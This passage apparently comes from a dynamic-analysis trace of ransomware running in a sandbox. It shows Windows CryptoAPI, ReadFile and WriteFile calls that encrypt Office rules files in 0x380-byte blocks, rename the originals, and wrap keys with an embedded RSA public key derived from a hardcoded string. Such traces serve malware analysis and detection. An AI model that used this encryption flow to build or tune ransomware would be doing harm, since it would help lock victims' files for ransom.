pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.275] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.275] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.275] CryptEncrypt (in: hKey=0x2fa408, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.275] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.277] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\outlook.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\outlook.exe_rules.xml.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\outlook.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\outlook.exe_rules.xml"), bFailIfExists=0) returned 1 [0269.292] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\outlook.exe_Rules.xml", dwFileAttributes=0x0) returned 1 [0269.292] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\outlook.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\outlook.exe_rules.xml.gsg")) returned 1 [0269.295] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\outlook.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\outlook.exe_rules.xml"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\outlook.exe_Rules.xml.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\outlook.exe_rules.xml.fuck")) returned 1 [0269.296] CryptDestroyHash (hHash=0x2fa888) returned 1 [0269.296] CryptDestroyKey (hKey=0x2fa408) returned 1 [0269.296] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0269.296] FindNextFileA (in: hFindFile=0x29383f8, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0269.297] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0269.297] GetLastError () returned 0x0 [0269.297] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\powerpnt.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\powerpnt.exe_rules.xml")) returned 0x20 [0269.300] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\powerpnt.exe_Rules.xml", dwFileAttributes=0x80) returned 1 [0269.301] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\powerpnt.exe_Rules.xml" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\powerpnt.exe_rules.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0269.302] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\powerpnt.exe_Rules.xml.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\office\\16.0\\powerpnt.exe_rules.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0269.303] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Office\\16.0\\powerpnt.exe_Rules.xml.gsg", dwFileAttributes=0x2) returned 1 [0269.303] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2f24b58) returned 1 [0269.306] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0269.306] lstrlenA (lpString="yzLScEfviKODKVbxMUZoAxYXzMlQm") returned 29 [0269.306] CryptHashData (hHash=0x2fa5c8, pbData=0x28cb6c0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0269.306] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa5c8, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2fa888) returned 1 [0269.306] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0269.306] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0269.306] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2f25928) returned 1 [0269.307] CryptImportPublicKeyInfo (in: hCryptProv=0x2f25928, dwCertEncodingType=0x1, pInfo=0x2f310b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f310e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f310e8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2fa248) returned 1 [0269.307] CryptEncrypt (in: hKey=0x2fa248, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0269.307] CryptEncrypt (in: hKey=0x2fa248, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f25ac0*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2f25ac0*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0269.307] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f25ac0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f25ac0*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0269.308] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.318] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.318] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.343] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.343] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.343] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.344] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.344] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.344] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.344] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.344] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.344] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.344] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.353] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.353] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.354] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.354] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.354] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.354] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.354] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.354] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.355] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.355] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.355] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.355] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.355] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.355] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.355] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.355] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.355] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.355] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.355] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.355] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.356] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.356] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.356] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.356] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.356] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.356] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.356] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.356] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.356] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.356] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.356] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.356] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.356] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.357] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.357] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.357] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.357] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.357] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.357] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.357] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.357] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.357] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.357] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.357] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.357] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.357] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.357] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.358] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.358] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.358] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.358] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.358] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.358] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.358] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.358] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.358] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.359] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.359] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.359] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.359] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.359] CryptEncrypt (in: hKey=0x2fa888, hHash=0x0, 